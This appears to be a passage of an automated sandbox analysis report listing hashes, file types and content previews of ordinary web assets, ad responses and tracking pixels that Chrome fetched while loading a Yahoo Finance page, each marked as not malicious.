                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.item.yf-1e6z5da.yf-1e6z5da{display:flex}.beta.yf-1e6z5da.yf-1e6z5da{background-color:var(--_item-active-color);font-weight:var(--font-bold);color:var(--white);padding:2px var(--space-1);border-radius:var(--border-radius-s)}nav.yf-1e6z5da.yf-1e6z5da{--_selected-border-width:3px;--_item-color:var(--enabled-l2);--_item-active-color:var(--active-l2);--_item-hovered-color:var(--hovered-l2);--_item-pressed-color:var(--pressed-l2)}nav.yf-1e6z5da .nav-list.yf-1e6z5da{position:relative;display:flex;flex-direction:row;align-items:flex-start;gap:var(--space-4);overflow-x:auto;scroll-snap-type:x mandatory;scrollbar-width:none;font-size:var(--font-l);padding:0}nav.yf-1e6z5da .nav-list.yf-1e6z5da::-webkit-scrollbar{display:none}nav.yf-1e6z5da .nav-list li.yf-1e6z5da{display:block}@media only screen and (min-width: 768px){nav.yf-1e6z5da .nav-list.yf-1e6z5da{padding:0}}nav.yf-1e6z5da .nav-list .item.yf-1e6z5da{cursor:pointer;white-space:nowrap;border-bottom:var(--_selected-border-width) solid transpa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3657)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.408122321407459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:fZ713XvLCOAFiOr1GQimLbr/aE+1jes88387Sjny2tCsa6YICcfqIHDEXp:BR3eOgiOr1Lb/8387+yECRIjwp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:263D4876367F5ACDED499553F40B660C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C444BB9409CF2C7CC27F3C48109853F3C7FDA1FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1AE9ADD52B9EB4EB87D680E274B75C5AABA13C903BB2C493C68F631179AD7325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:71ECCD6373AD89624EA88D41A45AEE5A09FFBA57059951C60A205227A9D228B2B8CFABCD1766A12F759822332A59D987A1F23A5ED222E866F2106A39C8AC4DD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as P,A as z,e as Q,b as U,d as W,f as Y,j as F,i as S,B as C,L as c,k as H,l as J,G as E,v as K,_ as M,W as R,c as X,u as Z,g as v,a as w,$ as V,Q as p}from"./scheduler.Dsuh-FKt.js";import{S as x,i as $,t as m,g as y,a as b,e as I,c as ee,b as ie,m as ne,d as le}from"./index.CvwOawEI.js";import{g as te}from"./spread.CgU5AtxT.js";import{I as ae}from"./Icon.C8w5V9EK.js";import{g as T}from"./i13nUtil.8E8_gCdn.js";function j(l){let e,a;return e=new ae({props:{size:l[7]||l[6],icon:l[5],type:l[8],className:l[11]}}),{c(){ee(e.$$.fragment)},l(i){ie(e.$$.fragment,i)},m(i,s){ne(e,i,s),a=!0},p(i,s){const u={};s&192&&(u.size=i[7]||i[6]),s&32&&(u.icon=i[5]),s&256&&(u.type=i[8]),s&2048&&(u.className=i[11]),e.$set(u)},i(i){a||(m(e.$$.fragment,i),a=!0)},o(i){b(e.$$.fragment,i),a=!1},d(i){le(e,i)}}}function q(l){let e;const a=l[14].default,i=X(a,l,l[13],null);return{c(){i&&i.c()},l(s){i&&i.l(s)},m(s,u){i&&i.m(s,u),e=!0},p(s,u){i&&i.p&&(!e||u&8192)&&Z(i,a,s,s[13],e?w(a,s[13],u,null):v(s[13]),nu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "63-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 8819
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9498291184634144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:tT7oDlMYaC4eTUNhQ9cyUdDt88i7lq3uffHwyWmeVT:tT7ohMY6BQ9QdDtrc4Zvms
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D8DD3E0B2714819EDA9BE6E3BBBE0019
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:131F43F0CB4FEB48A6BED3F9624B0EAE25DA18B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E119516BBAB4101DBC22AAEC6E9DE018A3388D99445D1A7B2E097DF67460D23B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:73FD416E42D415633ACB47DBD53FC79B0DE8F091B53E325369CA0462FDF7E593F88A8816A23F183AA1DFBCEE3F1D0C748E75D4011D125A4075B6312FF664B59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..63-bundle.js....W.._.>=.j.....\/.......z.eYjl%qq$O..Y..~?......=...^..)K&..........f....=..t!..4......._.......9.L..x..L...wZ.[`..r...'.).L.6|.)..<....{...1...G..I.a.....a....~....K.F. ... i..D.....b.3..H_0...TF...$2&z...\:.....F......N@f!%.8.}bm.E.`kI.gau.,.K..Dd...w<...P.$f..W^$..(M.'B.q.&.'.E..E-..Np4..7fn.....&...".A..3.r.&.....3<..Uk....umO.\.13Z.2*.+g......o...%.;J....*..~..7z#op...9.Y.q.$.G.^._..0t.oFf.[..$.8....I.oN..9 9.....bz...)...F.Q6..K....Z+lJ...V...Mr^...c.go<_...,..Dm.....`#.1........V4..../...M.. ..@+.i[.. .n...Mv..f.1/.....V$......[.......&..-4.W.....4.I..c.-c..@i.....O....O"c.....;......../.......:.#4..;Q.i0.m"".B.d...6.e........+..l........A.Z7.'"t...7G...-if...8.f.7..6....N../Wz....$.-.....s........A.Y[.Vx..,./...$.D....,..B.......~;..~...i..1T.'.k....W.`..'...9.".Q....Xt~.?.[d.!.a.....+.....D$..,.t......#.Y.........d$.<....%.l.%..O......?wmY.9A......W..\9...v@d.`...;..;.O....BU.G.......<........8.(..>9.u..V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=ttd&uid=07c89b85-4c1c-424d-8df0-0123ed6cebb6&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3159)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.924285811246094
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8PnF06PLaPJwP4PPq+PwpP9FJP0L8xIp3koEdUtFseM7w0s4iew/wc821XC:8pmqgrCZmd3xEd93FsFPwc821y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0E507112ABFE40ED9CEBDBD2AAECF10C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:897057F36177351099C4E224BFA0DA605C96061F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:08531693CFBA6F637C73FAFCD99BFAA06F6CD5413ECBF9BB8A9AA61C5786CB08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E04C93C233B6B9955FDA87F6A506EFFBD67EDF6FFBA661B19A27A8026CF733E49EB3BBCEF4458B0A3C642D4D2CA0BC7B8D7BA422730E1B5EEED2F8539DD3A8C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Switch.BaMlRiYx.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.switch-label.yf-xyblh0{--thumb-size:2rem;display:flex;align-items:center;gap:var(--space-2);cursor:pointer;-webkit-user-select:none;-moz-user-select:none;user-select:none;-webkit-tap-highlight-color:transparent}.switch-label.sz-xx-small.yf-xyblh0{--thumb-size:1rem;white-space:nowrap}.switch-label.sz-x-small.yf-xyblh0{--thumb-size:1.2rem}.switch-label.sz-small.yf-xyblh0{--thumb-size:.75rem;--track-padding:.125rem;--thumb-shadow-radius:.25rem}.switch-label.sz-medium.yf-xyblh0{--thumb-size:1rem;--track-padding:var(--space-1);--thumb-shadow-radius:.5rem}.switch-label.sz-large.yf-xyblh0{--thumb-size:1.5rem;--track-padding:var(--space-1);--thumb-shadow-radius:.5rem}.switch-label.sz-x-large.yf-xyblh0{--thumb-size:2.8rem}.switch-label.labelRight.yf-xyblh0{flex-direction:row-reverse;width:-moz-fit-content;width:fit-content}.switch-inpt.yf-xyblh0{--thumb-highlight:hsl(0deg 0% 0% / 25%);--thumb-color:var(--surface4);--thumb-position:0%;--track-size:calc(var(--thumb-size) * 2);--thumb-transition-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):33359
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.833856127778497
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:Dt9JDhDZ358Io2xKN0RxKwrDqbh3f0megR7hm94Qzb8YIgPO84sKIoyAbS:xFx+/I1lr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1748DBB193F8F53BB67BEA9B53343B56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1F03F8EED7245B50E2B5307EFFD1A11E64536519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8E44E085E08DBEB0C4C406822CC86F77D7993CBA30AAE8083C167F2E8E29F999
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B6A624B0F29591F083D50B11849F72C93B2E578DE9E0D84EFF0DFCD8E5102BDB19AE3866BB27E90CEEFD673C85A37C8BAFF22ECFC90CE6CBDB416E98A1E3DB3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=3211675272074836&correlator=2177862424248956&eid=44809527%2C31087350%2C31084270&output=ldjh&gdfp_req=1&vrg=202409240101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyfin%2Cros%2Cdt%2Cus_yfin_ros_dt_top_center&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5&prev_iu_szs=970x250&ifi=2&sfv=1-0-40&fsfs=1&fsbs=1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1727716989743&adxs=147&adys=24&biw=1263&bih=907&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Ffinance.yahoo.com%2Fsectors%2Fbasic-materials%2F&vis=1&psz=1263x5478&msz=1263x298&fws=0&ohw=0&td=1&egid=1261&topics=1&tps=1&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1727716879323&idt=43100&ppid=792d504d4f703374684532754c687979385146426b414b47714e674c767a6e6547347e41&prev_scp=loc%3Dtop_center%26ri%3D1%26ay_floor_s%3Dfloors%2520set%26hb_pb100%3Dfalse%26hb_adomain%3Drelated.nativeinfoline.com%26hb_format%3Dbanner%26hb_source%3Dclient%26hb_size%3D970x250%26hb_pb%3D2.09%26hb_adid%3D58a132e04250fd7%26hb_bidder%3Dmedianet%26ay_floor%3D2.05%26ay_floor_m%3Dm_0.2&cust_params=abk%3D0%26bucket%3Drocket_GA_desk_test-3-v1%252Csixty-sec-reserved-refresh-control%252Cyf-smartasset-msg-b%252Cypf-new-article-template-release-exp-v2%252Cyf-portfoliodetail-experiment%26cobrand%3Dnone%26colo%3Dir2%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfinance%26ver%3Dnimbus%26usercountry%3DUS%26hashtag%3Dbasic-materials%26pct%3Dsectors%26pg_name%3Dbasic-materials%26pt%3Dutility%26spaceid%3D1197812728%26axid%3DPEWVATKPOAZXI2CFGJ2UY2DZPE4FCRSCNNAUWR3RJZTUY5T2NZSUOND6IE%26bka%3D0%26ay_floor_g%3Doptimize%26ay_floor_m%3Dm_0.2%26ay_floor_s%3Dmodel%2520not%2520loaded%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=18976222&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"/22888152279/us/yfin/ros/dt/us_yfin_ros_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=ceb5c07e3f54c951:T=1727716991:RT=1727716991:S=ALNI_Mbnu2HJDRSV8X4mtyHWq-kWdtKBKg",1761412991,"/","yahoo.com",1],["UID=00000efef8aaad6a:T=1727716991:RT=1727716991:S=ALNI_MawCIJ1q__CfBd_jnwHF61R-G3bpg",1761412991,"/","yahoo.com",2]],[138466991195],[6634140447],[5462617191],[3475794441],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsmjtOnKxi3-xuuFDR8chkiggJ2GxYyrlNcgmjJAaAVue4s6QqIwReE3a3Q0i2L4U9KM-So0l7NV412vFwb8ghaNNBB3dJnKLly417Kc0K4eOiTD","CI-Zl6yX64gDFeqb_QcdbLoHhA",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=26edfc1525c0d694:T=1727716991:RT=1727716991:S=AA-AfjaE1koosNkk5EAnDf3-RedX",1743268991,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script src="h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (27263)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3072178380094845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:0Hcmkx25/P3kPuUI3o5XJiaTCCsSoR8B7n9412k4mQIiNlHgyLtvUfHSl7Ht99N0:M7wJiigAt8MVULz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B18AF08EF91B3180EF1FB4F31013345E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D457EB66449233FF7738D8264AA5AC70BA28E620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2AC9661596844AB9D4309958B3FB4014D78DC898BCC11691C5BEF9F66AA441CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B984EE8667A18DB0B4CAAEA3673B31E3C4FA463B9CECAE736479AB1BCB342CC03CD4EA7755013337356A503505521020CA8006E3192BF3029F4C738E79DBB286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{n as M,a8 as ht,v as pt,s as gt,a1 as mt,a7 as yt,I as _t}from"./scheduler.Dsuh-FKt.js";import{H as oe,S as ve,R as He}from"./control.CYgJF_JY.js";new URL("sveltekit-internal://");function wt(e,n){return e==="/"||n==="ignore"?e:n==="never"?e.endsWith("/")?e.slice(0,-1):e:n==="always"&&!e.endsWith("/")?e+"/":e}function bt(e){return e.split("%25").map(decodeURI).join("%25")}function vt(e){for(const n in e)e[n]=decodeURIComponent(e[n]);return e}function ge({href:e}){return e.split("#")[0]}const At=["href","pathname","search","toString","toJSON"];function St(e,n,t){const r=new URL(e);Object.defineProperty(r,"searchParams",{value:new Proxy(r.searchParams,{get(a,o){if(o==="get"||o==="getAll"||o==="has")return s=>(t(s),a[o](s));n();const i=Reflect.get(a,o);return typeof i=="function"?i.bind(a):i}}),enumerable:!0,configurable:!0});for(const a of At)Object.defineProperty(r,a,{get(){return n(),e[a]},enumerable:!0,configurable:!0});return r}const Et="/__data.json",kt=".html__data.json";fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmMFfJ5XWa_sBIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "714-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 5116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2013
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.908279733198509
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Xmexe4UM0sDpMFmx8AA3cA42rzJhYw3dfLCfyzDcFWLUfB70oxY:WD4dftMAxdAHzJhYwtWf4DckQfBwoq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8A76BB880408D43F933060803674CCF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:89FD65D373B7CD5B7F0AD8D82005A4C36B3EE9CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9B0D98CB88BEFE65FC06CFFAA3023D6BC723ADC68133842AFC53C8CFFDC7E9D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:77ECCCA516373EB396BD4E00FD14A07F28F680E8C9D931A22FF12ACBA2307DF776FDA7FF73E519C2364CC9F8256EA0D464669D79CD7F7D9A81D8D32D9566E232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..714-bundle.js..X.O.8..+....W..R.. .a...+.. ...f...$v.v.....q.}.....u}.....c:..Gi...s.*Hf.... |.]d.....:N.H............a.L-..xx........s5........y.\.&rr...#}.........^oxI.B..v.o..@..K%K..q.t..;.m.X...d..zSx..T0..I.<.xf......!..b I....I..i.\{r...<.t.p5.X-.!.@.RH.sg>...R..N.C5..G.%I.q..............a."b2.."}.8w....3.B...[.5.i....`08o......^....]..........G.x.?...J........p....O.U.5GmaA.$......r.X4....c...#....O.U...Y..@_#\.w..k.n..pS..l.;..0..a.."..>.bo..+.h..7....H........e<.Z...d.D@.:..&...K...EP.:..'8B$.#3..J....bpQ.......G)..0...l..F#.M3.n.L..Q..Pm.f.*...SJ..^@..*.,J.X..p.%......DY.........z#u.&.....-..}LT8...6*....%..IT8........&`Pb.Zf..9.:#...n.;.t.l...|sU9..f.j<s......2.BH.3..DKNk.5.M.q.D.~.[^1/...fQ.1PJ.....)4....pX0..D.(.D.f..H9.........Y.....l..e..r...*..X1.....~g..4..\.:x...W....R..N..-+..a../qtkk..K!..+.d...)....K)...].(.2..n.....K.b...nl..4.3.ANr.g...N.iX........=.2.....$......^..z#&kV......}Ig$.\.b.U}u.0.(...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (49223)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):58551
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.269644313777682
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:QKaXx0jVTbawOPjwgwMwaq9HcZflvcNbIJVtXirpqnr3m:QKaXxDwOPZflvcNWVtXirpwr3m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:81F4C6D5668F3B59C83F55DD74ED3635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:72C80C025FBE08E933BCB71981C87F05684E262E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:70D215DCC7AECCE9B9BEB27C951796F42BF8E5084DF941C4B7F292CD8F72513F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DFD16DB2EDE9CD7175912C854D8515A048CAD566EE5942DCB15BD01798473BF1AD33A01693407BF648D81CFE0343091F75E64BCA1E726B696FB8967628407052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ReorderHandle.ID8a-xJC.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{v as ke,ah as qe,am as fe,al as je,E as Ne,s as ie,n as k,t as Ue,h as Xe,k as Ke,m as We,i as Ze}from"./scheduler.Dsuh-FKt.js";import{S as q,i as le,c as ve,b as _e,m as Fe,t as $e,a as xe,d as Me}from"./index.CvwOawEI.js";import{c as pe,w as Ye,d as Je}from"./43.BgWy8GOF.js";import{I as Qe}from"./Icon.C8w5V9EK.js";const be=/[&"<]/g,et=/[&<]/g;function tt(e,o=!1){const t=String(e),n=o?be:et;n.lastIndex=0;let r="",i=0;for(;n.test(t);){const l=n.lastIndex-1,s=t[l];r+=t.substring(i,l)+(s==="&"?"&amp;":s==='"'?"&quot;":"&lt;"),i=l+1}return r+t.substring(i)}function nt(e,o){if(!e||!e.$$render)throw new Error(`<${o}> is not a valid SSR component. You may need to review your build config to ensure that dependencies are compiled, rather than imported as pre-compiled modules. Otherwise you may need to fix a <${o}>.`);return e}let N;function Ve(e){function o(t,n,r,i,l){const s=je,u={on_destroy:N,context:new Map(l||(s?s.$$.context:[])),on_mount:[],before_update:[],after_update:[],callback
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (30726), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):30726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.391815082267386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:dUqVH4yHoIWXonTpBcEcuPIFw5r+zcxKwMg:uOH4ApBcEci+w9+zcxKwMg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F9F58BC68B0545C4ABA1ABC664A22B74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F4C51D449BF10280A6E13BBF1C39B28E5316BE84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1E7ADC9A24A57746863EF54F2DE5F8905C242EBC6D416713133FF989FB050222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:856AB15C1FC66B50F4955C0611D688A13DB3BC95FBBB8A0A86449B7B61A971AFF610BC193B6073A7F09756F2C030EE7BA2CB854778C529F9E3E2923FA8B2CC19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var SchainValidator={validateSchainString:function(n){if(!n||"string"!=typeof n)return!1;if(/\s/.test(n))return console.warn("Invalid schain: String cannot contain spaces"),!1;var e=n.split("!"),a=e.length;if(a<2)return console.warn("Invalid schain: Contains 0 nodes"),!1;for(var i,t=!0,r=0;r<a&&t;r++)var o=e[r].split(","),t=0===r?2===(i=o).length&&i[0]&&i[1]?/^\d+\.\d+$/.test(i[0])?0==i[1]||1==i[1]||(console.warn("Invalid schain: complete flag must be either 0 or 1"),!1):(console.warn("Invalid schain: version must be in the format <major>.<minor>"),!1):(console.warn("Invalid schain: There must be exactly 2 properties before 1st node: version and complete flag"),!1):function(n,e){if(n.length<3||!n[0]||!n[1]||!n[2]){console.warn("Invalid schain: Schain node "+e+" does not have the minimum number of properties. asi, sid, and hp are required");return false}if(n[0].startsWith("http:")||n[0].indexOf("/")>-1){console.warn("Invalid schain: Schain node "+e+" asi should be the canonical domain n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (29132), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29158
